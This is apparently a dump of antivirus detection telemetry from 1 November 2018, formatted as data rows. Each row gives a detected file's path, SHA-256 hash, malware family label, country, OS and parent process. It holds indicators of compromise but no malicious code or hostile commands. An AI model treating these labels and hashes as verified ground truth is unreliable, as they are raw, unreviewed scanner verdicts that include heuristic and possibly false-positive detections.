  Row(detection=Row(filename='ata emsa .scr', filepath='C:\\Users\\X\\Desktop\\ATA EMSA .scr', filesize=320000, name='WORM/Nenebra.A.#M1.#R1'), hash='53a514f013d76540f5daf64de34a640b8a214a9af019a5c257fd562ca7d50ee5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe2_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:41:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T19:14:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110838-8ec47ea0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ea1254c4\\AVSCAN-20181101-110748-853D8FC6\\AVSCAN-20181101-110838-8EC47EA0', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:08:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T12:11:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bdcamsetup.exe', filepath='C:\\Users\\X\\Documents\\Programs\\bdcamsetup.exe', filesize=17600000, name='W32/Virut.Gen.#M1.#R1'), hash='62e2ae62607f6c47921f45dccda776f9bce39b44644294f687eb79358063deec', metadata=Row(cmdline='\\\\\\/onboot', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Internet Download Manager\\IDMan.exe', parentsize=4100152, timestamp='2018-11-01T06:47:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[8].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[8].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110112-b0ae882e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110112-B0AE882E', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:00:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='57f90f2381f560685af89eabc0d76010a61d896b61bd5f7b5bd0e6c2df619e02', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\57F90F2381F560685AF89EABC0D76010A61D896B61BD5F7B5BD0E6C2DF619E02', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='57f90f2381f560685af89eabc0d76010a61d896b61bd5f7b5bd0e6c2df619e02', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:25:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:01:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00004b1a', filepath='C:\\Windows\\Temp\\tmp00001e74\\tmp00004b1a', filesize=12800000, name='TR/Patched.Ren.Gen.#M300.#R3134'), hash='58e3a43b823697e29db6ec2a35c2d145179ed2bef7b22e7e0cd272f865578e52', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-01T19:16:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142201-b5c283e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ed5e65bd\\AVSCAN-20181101-141758-9212A372\\AVSCAN-20181101-142201-B5C283E6', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172734-dbc20298', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_357a596a\\AVSCAN-20181101-172500-D01F2DF7\\AVSCAN-20181101-172734-DBC20298', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='c58b17af2e8cf9d1c9118ecd6aabd0d8c4c8edf7529d60b6ad26b176989adda4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:27:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sitemap.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\sitemap.html', filesize=648000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='e9bf57992620862f71f198811f2c989018f63ca54f0216b8eac051bde3e3e2e6', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T12:57:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered maret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered maret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='d10b64f3d6d9307bbc0c72f71da97d688d13752bb597a30c0fff8fd1a3dfd5cd', metadata=Row(cmdline='{45E669E1-C023-4423-AFF9-B9DF53E3DEAF} S-1-5-21-2376277972-633460711-2922603215-1000:Ich-PC\\\\\\\\Ich:Interactive:Highest[1]', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\taskeng.exe', parentsize=192000, timestamp='2018-11-01T12:24:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-081033-612c63d8', filepath='C:\\Documents and Settings\\X\\Datos de programa\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-081003-5B266F58\\AVSCAN-20181101-081033-612C63D8', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:10:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='server.exe', filepath='C:\\Program Files (x86)\\Autodesk\\Backburner\\server.exe', filesize=320000, name='W32/Neshta.A.#M1.#R1'), hash='5808b1f3fde8f0c4efbe55a835c3b8fdd8d44f7849f16bff22dc2643bfe1e107', metadata=Row(cmdline='\\\\\\/c', country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe', parentsize=185672, timestamp='2018-11-01T10:23:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.vir', filepath='C:\\ProgramData\\Microsoft\\WmiAppSrv\\csrss.VIR', filesize=1344000, name='TR/Crypt.FKM.Gen.#M300.#R581'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T03:06:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='prst.dll', filepath='F:\\Users\\X\\AppData\\Local\\Temp\\sega\\Prst.dll', filesize=128000, name='TR/SPY.KeyLogger.zakea.#M1.#R1'), hash='a5ed6f4644f888a56ed7c57c53fbb6f1f7a49454db4c09a58fc6617a29b7cb1f', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:54:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='trustedinstaller.exe', filepath='C:\\Temp\\TrustedInstaller.exe', filesize=192000, name='BDS/Androm.EB.73.#M0.#R0'), hash='5f17703ba5daa3a0d89ebcf8edc87f7035aac00d53945e9d0068ac46f5e267d6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T10:44:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-012032-167fc04d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8ee50773\\AVSCAN-20181101-011928-0E61CA2D\\AVSCAN-20181101-012032-167FC04D', filesize=4800000, name='TR/Spy.Banker.Gen.#M1.#R1'), hash='6a10f4e287d21dd6ef83dd4c4fe2a109922634b96f93274f2c2bdbcbd68ebea7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:22:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dllhost.exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\dllhost.exe', filesize=576000, name='TR/Patched.Gen.#M300.#R3374'), hash='6986d5ba98f2045982e0b194db81dcfd48b66fb5eb8088d76935846a6c9830e8', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:35:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nslB876.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:59:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111916-3958fdc4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111916-3958FDC4', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:19:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T08:12:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215510-08dc8b3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c140b373\\AVSCAN-20181101-215457-06E00DDC\\AVSCAN-20181101-215510-08DC8B3B', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:55:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2d43a3ec1910e4047b1ec2c047da601cd0c532e3cc3e376150610f6f5db19e4c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-16.available\\Avira\\2D43A3EC1910E4047B1EC2C047DA601CD0C532E3CC3E376150610F6F5DB19E4C', filesize=184000, name='W32/Elkern.B.#M1.#R1'), hash='2d43a3ec1910e4047b1ec2c047da601cd0c532e3cc3e376150610f6f5db19e4c', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:53:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002158-35212350', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002158-35212350', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:22:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002018-f25035c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-230344-574DB10D\\AVSCAN-20181102-002018-F25035C3', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:20:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-131116-0963ea98', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aacd22b7\\AVSCAN-20181101-130853-EFC7726D\\AVSCAN-20181101-131116-0963EA98', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:11:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184245-41d34833', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_41c160bd\\AVSCAN-20181101-184208-3BBDB8B0\\AVSCAN-20181101-184245-41D34833', filesize=2048000, name='TR/RedCap.gblsf.#M1.#R1'), hash='850d55400b4b6ec3ddcf70a5fae5cbff91c81b8dcf9fff2bc47717cf99dbba48', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T16:42:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0115529.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0115529.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:36:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002435-461b3fcf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002435-461B3FCF', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:24:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2bd94e6cfeacb75c248a1aa848e4ae870e4dc08f9a0b54e006b487da39bc581e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\2BD94E6CFEACB75C248A1AA848E4AE870E4DC08F9A0B54E006B487DA39BC581E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2bd94e6cfeacb75c248a1aa848e4ae870e4dc08f9a0b54e006b487da39bc581e', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:27:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000a8d35', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000a8d35', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:49:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='844393847a1b655a9f2df69e63b820eebcd04b94635b5f5e3d63df7de3990aa6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.categorizing\\844393847A1B655A9F2DF69E63B820EEBCD04B94635B5F5E3D63DF7DE3990AA6', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='844393847a1b655a9f2df69e63b820eebcd04b94635b5f5e3d63df7de3990aa6', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T09:25:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-175402-cb1856a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_29d67868\\AVSCAN-20181101-171852-E21F9068\\AVSCAN-20181101-175402-CB1856A3', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:54:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobeflashplayer__bda6c15151n8nad7.exe', filepath='C:\\Users\\X\\Desktop\\AdobeFlashPlayer__bda6c15151n8nad7.exe', filesize=1600000, name='HEUR/AGEN.1031193.#M1.#R1'), hash='83c68f4aaec157d428229232c08027f071c583017513624bbe52ef1c13b0ce98', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T19:40:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-171623-3a1fcb3b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2c70ddd3\\AVSCAN-20181101-171607-3803CCEC\\AVSCAN-20181101-171623-3A1FCB3B', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:16:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rama_jeton.doc', filepath='C:\\Users\\X\\Documents\\5.1 6.1 7.1 8.1\\Deckblätter_6_1_2HJ_16_17\\Rama_Jeton.doc', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='827b617e805d82d3dc529c33cec6c3056117d718cc7723188b591f54c3f58da8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe23_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe23 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:24:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gag.dll', filepath='ProgramFilesDir/[PluginsDir]/gag.dll', filesize=128000, name='PUA/Outbrowse.Gen.#M2.#R5697'), hash='1637407ac610ce29ed4f4f1c6da3cb8f683c502374d0638389fe3c8e2bdc7c91', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='16', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T10:43:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fonet.stkwsengine.dll', filepath='C:\\FONETHBYS\\Fonet.STKWsEngine.dll', filesize=1792000, name='HEUR/AGEN.1019132.#M1.#R1'), hash='38d68aebf0f2146e25de7d65b362bf117f19aa1b0dfa749f61f62d2bebe141af', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:50:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213620-3a5d737c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56928e8e\\AVSCAN-20181101-213456-30AB5B45\\AVSCAN-20181101-213620-3A5D737C', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:36:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0d9de61eb9c9cf786827bea229bcfe5624e3ff4ce80136f06f2c5aaaa7d42fce.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\0D9DE61EB9C9CF786827BEA229BCFE5624E3FF4CE80136F06F2C5AAAA7D42FCE.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0d9de61eb9c9cf786827bea229bcfe5624e3ff4ce80136f06f2c5aaaa7d42fce', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:16:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002936-66b9a727', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002936-66B9A727', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:29:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jp2launcher.exe', filepath='E:\\trash\\moafaq 8-11-2016\\source\\desktop2014\\my documents\\Downloads\\Programs\\Java\\x64\\jre6\\bin\\jp2launcher.exe', filesize=256000, name='W64/Infector.Gen.#M300.#R8089'), hash='5b69787a82cd872e14f26c5e9637feed74f022300a15f440d6f041fa6e29f2ab', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T16:53:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='_@dfdg00000000.tmp.dat.exe', filepath='C:\\Documents and Settings\\X\\Application Data\\cfjcf\\_@dfdg00000000.tmp.dat.exe', filesize=548000, name='HEUR/AGEN.1030705.#M1.#R1'), hash='2b65ccefbf496b78e0c6bf7c7393ac55a6100bd9fe11bf4e84c78650fc424017', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:19:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eed0e45b4744f40dd843f0a509a999e7496c1d9b9360168a73c68623a0815575.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\26.03.2018-175.available\\Avira\\Others\\PE-detected-Avira\\HEUR.AGEN.1010043\\eed0e45b4744f40dd843f0a509a999e7496c1d9b9360168a73c68623a0815575.MRG', filesize=320000, name='HEUR/AGEN.1010043.#M1.#R1'), hash='eed0e45b4744f40dd843f0a509a999e7496c1d9b9360168a73c68623a0815575', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\27.10.2017-145.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-01T15:50:16Z'), dt=datetime.date(2018, 11, 1)),
